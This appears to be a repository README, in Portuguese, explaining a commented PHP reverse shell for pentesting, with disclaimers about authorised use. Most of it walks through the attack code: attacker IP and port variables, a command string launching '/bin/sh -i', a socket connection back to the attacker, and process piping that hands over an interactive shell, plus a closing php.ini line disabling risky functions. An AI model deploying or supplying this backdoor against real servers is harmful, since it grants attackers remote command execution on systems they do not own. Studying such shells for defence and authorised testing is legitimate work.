Loading repository data…
Loading repository data…
h4ckthreat / repository
Este repositório contém um script de shell reverso em PHP comentado, ideal para fins educacionais e testes de segurança autorizados.
Este repositório contém um script de shell reverso em PHP comentado, ideal para fins educacionais e testes de segurança autorizados.
Este código é potencialmente perigoso e pode ser utilizado de forma maliciosa. No entanto, ele também tem aplicações legítimas em testes de intrusão (pentest), auditorias de segurança e simulações ofensivas.
❗ Nunca utilize este tipo de código em sistemas sem permissão explícita.
O uso indevido pode violar leis locais e internacionais.
O autor não se responsabiliza por qualquer dano ou uso indevido.
Este código é um shell reverso, ou seja, um tipo de backdoor que faz com que o servidor PHP (vítima) se conecte a outro computador (atacante), oferecendo um terminal remoto com o mesmo privilégio do processo PHP (normalmente www-data, apache, etc.).
set_time_limit(0);
$VERSION = "1.0";
$ip = '127.0.0.1'; // IP do atacante - deve ser alterado
$port = 1234; // Porta do atacante - deve ser alterada
set_time_limit(0) → desativa o limite de tempo do script (ele roda indefinidamente).$ip e $port → definem para onde o script PHP irá se conectar.$shell = 'uname -a; w; id; /bin/sh -i';
uname -a → informações do sistema operacional.w → usuários logados.id → UID e grupos do processo./bin/sh -i → shell interativo.if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
...
}
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
$process = proc_open($shell, $descriptorspec, $pipes);
/bin/sh -i com entrada e saída redirecionadas para pipes.stream_set_blocking(..., 0);
while (1) {
...
}
fclose(...);
proc_close(...);
printit()function printit($string) {
if (!$daemon) {
print "$string\n";
}
}
Este script:
No php.ini, desative funções perigosas para evitar exploração:
disable_functions = proc_open, shell_exec, system, passthru, exec, popen, fsockopen
Distribuído sob a GNU GPL v3.